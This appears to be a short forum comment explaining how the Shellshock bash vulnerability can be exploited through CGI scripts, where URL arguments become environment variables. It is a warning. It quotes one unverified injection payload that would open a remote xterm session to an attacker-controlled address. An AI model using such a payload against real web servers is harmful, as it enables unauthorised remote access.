The big risk is in CGI execution under web servers. Apache (and others) automatically add CGI URI arguments as environment variables prior to executing CGI scripts. So if I find a CGI script on your web site, and add "?foo='() { ;;}; xterm -display my.ip.address:0.0'" into the URL then if the site CGI script executes _anything_ through bash, maybe even as innocuous as `date` - then that command in the URL gets executed. (I haven't verified that command yet, but you get the gist).
Even if your CGI scripts carefully sanitise and check inputs, there's still a hole there through hidden environment variables that can get executed.